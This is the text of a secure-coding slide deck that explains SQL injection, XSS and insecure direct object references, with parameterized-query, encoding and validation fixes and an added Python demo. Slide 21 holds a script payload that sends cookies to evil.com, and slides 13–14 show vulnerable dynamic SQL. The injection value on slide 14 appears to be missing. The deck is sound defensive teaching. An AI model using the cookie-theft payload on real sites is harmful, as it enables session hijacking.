Bünyamin Demir - Secure YourApp
- 2. Bünyamin Demir (@bunyamindemir)
– Bachelor's degree: Kocaeli University, Department of Mathematics
– Master's degree: Kocaeli University, Graduate School of Natural and Applied Sciences; thesis on Oracle Database Security
– Application Developer
– OWASP Turkey Chapter Leader
– Penetration Testing Specialist
• Web, mobile, network, SCADA, wireless, social engineering, ATM, DoS/DDoS and load testing
• Source code analysis
– Trainer
• Web/Mobile Application Security Auditing
• Secure Code Development
• Database Security
- 5. OWASP Projects
• OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide
- 13. Anatomy of SQL Injection Attack
sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = 'john' AND password = 'password'
- 14. Anatomy of SQL Injection Attack
sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = 'john' AND password =
causes all rows in the users table to be returned!
- 15. Bind Parameters (PHP)
$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
- 16. Parameterized Query (.NET)
SqlConnection objConnection = new SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
    "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);
// AddWithValue binds the text box contents as parameter values, never as SQL text
objCommand.Parameters.AddWithValue("@Name", NameTextBox.Text);
objCommand.Parameters.AddWithValue("@Password", PassTextBox.Text);
SqlDataReader objReader = objCommand.ExecuteReader();
- 17. Prepared Statement (Java)
String newName = request.getParameter("newName");
String id = request.getParameter("id");
// SQL: the statement text is fixed, the values are bound by position
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
// HQL: the same idea with a named parameter
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
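Slides 13 and 14 show dynamic SQL built from request values and slides 15 to 17 show the fix. The following Python/sqlite3 example is added here and is not part of the original deck: it builds a constructed in-memory user_table, runs the same lookup both ways, and shows that a single quote inside a value (a legitimate name such as o'neil) is parsed as SQL syntax by the dynamic version but stays plain data when bound as a parameter.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed sample rows mirroring the slide's user_table (not data from the deck).
# Plaintext passwords are kept only to stay close to the slide's query shape.
SAMPLE_USERS = [
    (1, "john", "password"),
    (2, "o'neil", "s3cret"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory user_table populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_table (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user_table VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_user_dynamic(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """The slide's dynamic SQL: untrusted values are spliced into the statement text.
    Any quote character in the input becomes part of the SQL the parser sees, so the
    input is treated as code rather than data (visible here as a syntax error)."""
    sql = ("SELECT * FROM user_table WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def lookup_user_bound(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Bound parameters: the statement text never changes, values travel separately,
    so a quote in the username is compared literally against the column."""
    sql = "SELECT * FROM user_table WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def quote_breaks_dynamic_sql(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Return True when the dynamic variant fails to parse for this input."""
    try:
        lookup_user_dynamic(conn, username, password)
        return False
    except sqlite3.OperationalError:
        return True
```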
- 20. Anatomy of XSS Attack
http://www.davshan.loc/friends.php?search=<abc>
<p>Result for <b><abc></b> :0<p><br />
http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
- 21. Anatomy of XSS Attack
<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>
187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....
- 22. OWASP Java Encoder Project
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
<%-- JavaScript Block Context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- JavaScript Variable Context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
- 24. OWASP HTML Sanitizer Project
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .build();
String safeHTML = policy.sanitize(untrustedHTML);
- 26. A4 – Insecure Direct Object References
• Attacker notices his acct parameter is 6065
?acct=6065
• He modifies it to a nearby number
?acct=6066
• Attacker views the victim's account information
https://www.onlinebank.com/user?acct=6065
- 28. Input Validation - Java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Allow-list validation: only 6 to 12 ASCII letters or digits are accepted
public boolean validateUsername(String username) {
    String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
    if (username == null) {
        return false;
    }
    Pattern p = Pattern.compile(usernamePattern);
    Matcher m = p.matcher(username);
    if (!m.matches()) {
        return false;
    }
    return true;
}

if (!validateUsername(username))
{
    // invalid username
}
- 29. Input Validation - .NET
using System.Text.RegularExpressions;

if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.s]{1,10}$"))
{
    // the class name is not valid
}